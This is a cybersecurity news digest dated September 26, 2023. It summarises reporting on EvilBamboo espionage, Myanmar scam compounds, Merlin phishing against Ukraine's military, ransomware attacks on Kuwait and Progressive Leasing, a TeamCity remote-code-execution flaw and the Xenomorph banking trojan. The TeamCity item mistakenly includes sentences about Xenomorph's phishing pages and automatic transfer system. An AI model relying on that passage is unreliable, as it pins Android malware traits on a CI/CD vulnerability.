Daily Drop (607): EvilBamboo, Myanmar's Growing Cyber Scam, US-China Cybersecurity, Ukrainian Military Faces Phishing, Rhysida Ransomware, JetBrains TeamCity, AlphV/Black Cat, Xenomorph
09-26-23
Tuesday, Sep 26, 2023 // (IG): BB // Financial Enabler PODCAST // Coffee for Bob
EvilBamboo's Cyber Espionage: Targeting Tibetans, Uyghurs, and Taiwanese
Bottom Line Up Front (BLUF): EvilBamboo, a cyber espionage group previously known as Evil Eye, has been actively targeting Tibetan, Uyghur, and Taiwanese individuals and organizations since 2019. Using a mix of fake websites, trojanized apps, and social media impersonation, the group aims to gather sensitive information from these communities.
Analyst Comments: The sophistication and persistence of EvilBamboo's operations underscore the evolving nature of cyber threats. Their ability to create and leverage fake communities, coupled with their use of trojanized apps, indicates a high level of expertise and resources. Users and organizations need to be increasingly cautious about their online interactions and the sources from which they download apps or software. The campaign's success also points to a gap in current security mechanisms, emphasizing the need for more robust measures to prevent such threats.
FROM THE MEDIA: EvilBamboo has orchestrated a comprehensive campaign, creating fake Tibetan websites and social media profiles to deploy browser-based exploits. They've also impersonated popular communities, building a presence on platforms like Telegram to distribute their malware. Historically, they've exploited vulnerabilities in systems like Apple's WebKit browser engine to deliver spyware strains, such as Insomnia. The group has been associated with various Android malware, notably ActionSpy, PluginPhantom, BADBAZAAR, BADSIGNAL, and BADSOLAR. Their distribution methods are diverse, ranging from APK sharing forums to fake profiles on major social media platforms.
READ THE STORY: THN
Myanmar's Growing Cyber Scam Crisis: UNODC Report Highlights
Bottom Line Up Front (BLUF): Organized crime groups, primarily from China and Taiwan, have established fortified bases in Myanmar's border areas, particularly near China, to conduct extensive online scams. These regions are challenging for law enforcement to access, and the trafficked victims used for scams find it nearly impossible to escape.
Analyst Comments: The establishment of these scam bases in remote areas of Myanmar underscores the adaptability and resourcefulness of organized crime groups. Their ability to exploit regions with limited governmental control, combined with the use of trafficked labor, indicates a high level of sophistication and poses a significant challenge for regional law enforcement. The involvement of ethnic militias further complicates the situation, intertwining criminal activities with regional political and ethnic conflicts. The scams' evolution, initially emerging in Cambodian casinos and then transitioning to online operations during the pandemic, suggests that these groups are quick to capitalize on changing circumstances and vulnerabilities. International cooperation and a comprehensive approach will be crucial to address this multifaceted challenge.
FROM THE MEDIA: The United Nations Office on Drugs and Crime (UNODC) report reveals that these crime gangs, responsible for Asia's "scamdemic," have scammed billions through online romance scams, extortion, and investment pyramid schemes. While some crackdowns occurred in Cambodia and the Philippines, these groups have fortified their operations in Myanmar, especially around the Myawaddy region and along the eastern frontier with China. These areas are controlled by ethnic militias with a history of trafficking and are far from the reach of Myanmar's military government. The UNODC report highlights that Myanmar is home to non-state armed groups that control significant border areas and have a history of collaborating with organized crime syndicates. These groups operate numerous casinos in autonomous regions and border towns. The scam hubs have attracted tens of thousands from Asia and beyond, many of whom believed they were recruited for legitimate high-paying tech jobs. Once inside these fortified compounds, many victims realize the scam and must pay ransoms to leave. Some are aware of the scam nature of the job before arriving, recruiting others for a fee. The Myanmar government has not commented, but regional cooperation is underway to address the scam crisis.
READ THE STORY: VOA
US-China Cybersecurity Summit: Bridging Digital Divides
Bottom Line Up Front (BLUF): On September 22, 2023, high-ranking defense officials from the US and China convened at the Pentagon for a landmark cybersecurity summit. This meeting aimed to introduce the Chinese delegation to the US Department of Defense's 2023 Cyber Strategy Summary and to foster mutual understanding and cooperation in the digital realm.
Analyst Comments: The significance of this summit is immense, given the pivotal role of cyberspace in global stability and national security. Direct dialogue between major powers like the US and China is crucial to address the tangible risks in the digital realm, such as miscommunication and unintentional escalation. This meeting represents a step towards building a foundation of trust in cyberspace. While challenges remain, such engagements offer hope for a more collaborative future in the digital domain. The international community should recognize the importance of such diplomatic efforts, emphasizing the role of cooperation in managing the complexities of the digital age. As the cyber landscape continues to evolve, the insights from this summit underscore the enduring importance of diplomacy in ensuring a peaceful and stable digital environment.
FROM THE MEDIA: The summit, a blend of in-person and virtual attendance, highlighted the lasting effects of the COVID-19 pandemic on international diplomacy. The backdrop for this event was the US-PRC Memorandum of Understanding on Notification of Major Military Activities Confidence Building Measure Mechanism, signed in 2014. This agreement seeks to prevent misunderstandings and miscommunications between the two military superpowers. The 2023 Cyber Strategy Summary, a comprehensive document, was the focal point of the meeting. This strategy emphasizes the Pentagon's commitment to bolstering its cyber networks against emerging threats. The discussions during the summit were extensive, covering topics from establishing cyber norms to collaborative initiatives and deterrence strategies. Both nations acknowledged the importance of mutual respect and trust in the cyber domain.
READ THE STORY: Eurasisa Review
Ukrainian Military Faces Phishing Attacks Using Drone Manuals
Bottom Line Up Front (BLUF): The Ukrainian military is being targeted by a phishing campaign that uses drone manuals as bait to deliver the Merlin post-exploitation toolkit. Given the significant role of drones in the Ukrainian military, attackers are exploiting this interest with malware-infused UAV service manuals.
Analyst Comments: The increasing sophistication of cyber attacks, especially those targeting military and critical infrastructure, underscores the need for heightened cybersecurity measures and awareness. The use of relevant lures, such as drone manuals, in this case, indicates that attackers are continually refining their methods to exploit specific interests and vulnerabilities of their targets. As cyber threats evolve, it is crucial for organizations, especially those in sensitive sectors, to stay updated on the latest tactics and bolster their defenses accordingly.
FROM THE MEDIA: Cybersecurity researchers from Securonix have identified a phishing campaign targeting Ukrainian military entities. The attackers use drone manuals as lures to deliver an open-source post-exploitation toolkit called Merlin. The campaign, named STARK#VORTEX by Securonix, begins with a Microsoft Compiled HTML Help (CHM) file. When this file is opened, it runs malicious JavaScript that triggers PowerShell code, which then contacts a remote server to fetch an obfuscated binary. This binary, when decoded, reveals the Merlin Agent, allowing attackers to take control of the host system. The researchers noted the complexity of the attack's TTPs (Tactics, Techniques, and Procedures) and obfuscation methods, which are designed to evade detection. This is the first instance where Merlin has been used to target Ukrainian government organizations. A similar attack chain was reported by the Computer Emergency Response Team of Ukraine (CERT-UA) in August 2023, which also used CHM files as decoys. The files and documents used in this campaign are designed to bypass defenses. Receiving a Microsoft help file over the internet might typically be considered unusual, but the attackers have crafted the documents to appear legitimate, potentially catching unsuspecting victims off guard.
READ THE STORY: THN
Rhysida Ransomware Gang Demands Payment, Government Assures Payroll Systems Unaffected
Bottom Line Up Front (BLUF): Kuwait's Ministry of Finance has been hit by a ransomware attack, with the Rhysida ransomware gang claiming responsibility and demanding a ransom. Despite the attack, the government has assured that payroll systems remain unaffected.
Analyst Comments: The increasing frequency of ransomware attacks on government entities underscores the escalating threat landscape. Governments and organizations must bolster their cybersecurity defenses and remain vigilant against such threats. The commitment to not paying ransoms, as advocated by the U.S. National Security Council, may deter attackers in the long run, but in the short term, entities must prioritize preventive measures and rapid response capabilities.
FROM THE MEDIA: On September 18, the government of Kuwait experienced a ransomware attack targeting its Ministry of Finance. In response, officials immediately took action to isolate and shut down the affected systems. To address concerns, the government emphasized that the payment and payroll systems were on a separate network and remained unaffected by the attack. The country's National Cyber Center has been working diligently to resolve the issue, seeking assistance from cybersecurity firms and other governments. In a statement, the government explained, “Since the first day of the cyberattack, we have been isolating the systems of the Ministry of Finance from the rest of the systems of government agencies... All government agencies are continuing and operating normally.” On the morning of September 26, the Rhysida ransomware gang added the Ministry of Finance to its list of victims and set a seven-day deadline for the payment of an undisclosed ransom amount. This group has previously targeted other governments and was responsible for a significant attack on Prospect Medical Holdings in the U.S.
READ THE STORY: The Record
Unauthenticated Attackers Can Exploit Flaw for Remote Code Execution on Affected CI/CD Software
Bottom Line Up Front (BLUF): A severe security vulnerability has been identified in JetBrains TeamCity, a continuous integration and continuous deployment (CI/CD) software. This flaw, if exploited, allows unauthenticated attackers to execute remote code on impacted systems, potentially compromising source code, building pipelines, and more.
Analyst Comments: The discovery of this critical vulnerability in JetBrains TeamCity underscores the importance of timely software updates and patches. Given the potential ramifications of a successful exploit, organizations using TeamCity should prioritize updating to the patched version or implementing the provided security patch plugin. The shift in malware distribution tactics from app stores to phishing web pages also highlights the evolving strategies of threat actors, emphasizing the need for continuous vigilance and cybersecurity awareness.
FROM THE MEDIA: The vulnerability in JetBrains TeamCity, labeled as CVE-2023-42793 and rated with a CVSS score of 9.8, can be leveraged by attackers without authentication to achieve remote code execution. This flaw was responsibly disclosed on September 6, 2023, and has since been patched in TeamCity version 2023.05.4. Successful exploitation could lead to theft of source code, service secrets, private keys, and even control over attached build agents. Furthermore, attackers could poison build artifacts and compromise the integrity of supply chains by accessing and injecting arbitrary code into build pipelines. The latest campaigns distributing the malware have shifted from Google Play to phishing web pages, often masquerading as trusted Chrome browser update sites or Google Play store websites. The malware's recent version showcases a sophisticated Automatic Transfer System (ATS) framework, enabling automatic fund transfers from compromised devices to those under attacker control.
READ THE STORY: THN
AlphV/Black Cat Ransomware Gang Claims Responsibility, Potentially Affecting Over 40 Million Customers
Bottom Line Up Front (BLUF): Progressive Leasing, a prominent lease-to-own company, has disclosed a cyberattack that may have compromised sensitive customer data. The AlphV/Black Cat ransomware gang has taken credit for the breach.
Analyst Comments: The cyberattack on Progressive Leasing underscores the growing threat posed by ransomware gangs targeting high-profile companies and accessing vast amounts of sensitive data. Organizations must prioritize cybersecurity measures, including regular backups, employee training, and rapid incident response, to mitigate the risks associated with such attacks.
FROM THE MEDIA: Progressive Leasing, a billion-dollar company offering lease-to-own options for consumer products, recently disclosed a cybersecurity incident affecting some of its systems. While the company has not observed significant operational impacts from the attack, an investigation is ongoing to determine the full extent of the breach. Upon detecting the incident, Progressive Leasing promptly engaged third-party cybersecurity experts and initiated an investigation. The company is collaborating with these experts and law enforcement to address the situation. The investigation aims to identify the specific data involved in the breach. Progressive Leasing, headquartered in Salt Lake City, has partnerships with major retailers such as Best Buy, Samsung, Cricket, Lowe's, Zales, Overstock, Dell, and others. It operates as part of PROG Holdings, a larger corporation offering "buy now, pay later" options. In a recent report to the SEC, PROG Holdings revealed that the compromised data likely contains a significant amount of personally identifiable information, including social security numbers, of Progressive Leasing's customers.
READ THE STORY: The Record
Xenomorph Malware Expands Reach to US Bank Customers
Bottom Line Up Front (BLUF): The Android banking Trojan, Xenomorph, which had been primarily targeting European banks for over a year, has now expanded its operations to target customers of over 30 US banks, posing a significant threat to the financial security of countless individuals.
Analyst Comments: The evolution and expansion of Xenomorph underscore the escalating threat landscape of mobile banking Trojans. Android users, in particular, are at a heightened risk given the increasing interest of threat actors in the Android environment due to its vulnerabilities and the mistakes made by Android app developers. The shift in Xenomorph's targeting from European to US banks indicates a strategic move by the threat actors to exploit potentially more lucrative targets. The combination of its sophisticated capabilities and its focus on major US financial institutions makes Xenomorph a significant threat that requires immediate attention and mitigation.
FROM THE MEDIA: The cybercriminals behind Xenomorph, a sophisticated Android banking Trojan, have shifted their focus from European banks to the US. This malware now targets customers of major financial institutions including Chase, Amex, Ally, Citi Mobile, Citizens Bank, Bank of America, and Discover Mobile. Recent samples of the malware have shown additional features that target multiple cryptocurrency wallets, such as Bitcoin, Binance, and Coinbase. Thousands of Android users, especially in the US and Spain, have been affected since August. The malware seems to have a particular interest in Android devices from Samsung and Xiaomi, which together account for about 50% of the Android market share. Previously distributed through malicious apps on Google's Play Store, the latest Xenomorph campaigns use phishing web pages, often masquerading as trusted Chrome browser update sites or Google Play store websites. The malware's capabilities range from intercepting SMS messages and harvesting device information to enabling online account takeovers.
READ THE STORY: DarkReading
Items of interest
Eric Schmidt's Influence: Leveraging Wealth to Shape AI Policy and Global Tech
Bottom Line Up Front (BLUF): Eric Schmidt, the former CEO of Google, is utilizing his vast fortune to influence artificial intelligence (AI) policy and technological advancements in the U.S. and globally. Through various initiatives, investments, and advisory roles, Schmidt has positioned himself as a significant player in the AI landscape, shaping public policy and fostering innovation.
Analyst Comments: Eric Schmidt's involvement in AI policy and development showcases the potential influence of individual billionaires in shaping global tech trajectories. His investments, both personal and through various initiatives, have positioned him as a central figure in the AI discourse. As the U.S. government seeks to establish global standards for AI regulation, Schmidt's influence, combined with his vast network and resources, will likely continue to play a pivotal role in the direction of AI policy and innovation.
FROM THE MEDIA: Eric Schmidt, with a net worth of $US27 billion, has been an influential figure in the tech industry, particularly in the realm of AI. Beyond his personal investments, such as purchasing a superyacht and owning a stake in a hedge fund, Schmidt has been actively involved in shaping AI policy in Washington. He has consistently advocated for the U.S. to invest both public and private funds in innovative companies to counter China's technological growth. Schmidt founded the Special Competitive Studies Project (SCSP) in 2021, a think tank focusing on the implications of AI and other emerging technologies on the U.S. economy and national security. SCSP has been actively involved in advising various congressional committees. Additionally, Schmidt Futures, another of his initiatives, supports scientists and entrepreneurs globally. Some of these beneficiaries have even taken roles within governments worldwide. Schmidt's influence is evident in his advisory roles under three consecutive U.S. presidential administrations. He led the National Security Commission on AI from 2019 to 2021, mandated by Congress.
READ THE STORY: SMH
Episode 14: Swampy - Ukranian EOD Vol.(Video)
FROM THE MEDIA: Swampy isn't your typical online personality. Far from the filtered snapshots of beach vacations or the latest fashion trends, his feed offers a window into a world few dare to tread: the perilous landscape of the Russian-Ukrainian conflict. An EOD (Explosive Ordnance Disposal) technician, Swampy's day-to-day involves disarming explosives, a task that requires nerves of steel, unparalleled precision, and an unwavering commitment to the safety of those around him.
Episode 15: Abaddon Knives (Video)
FROM THE MEDIA: Meet Abaddon Knives - not just any EOD technician, but a beacon of resilience, dedication, and expertise in a field that demands unwavering bravery. Dive deep into the life of this incredible individual who effortlessly juggles the roles of a diligent EOD technician, a devoted father, and an insatiable reader.
These open-source products are reviewed by analysts at InfoDom Securities, providing possible context about current media trends related to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not endorse any third-party claims made in their original material or related links on their sites; the opinions expressed by third parties are theirs alone. For further questions, please contact InfoDom Securities at dominanceinformation@gmail.com.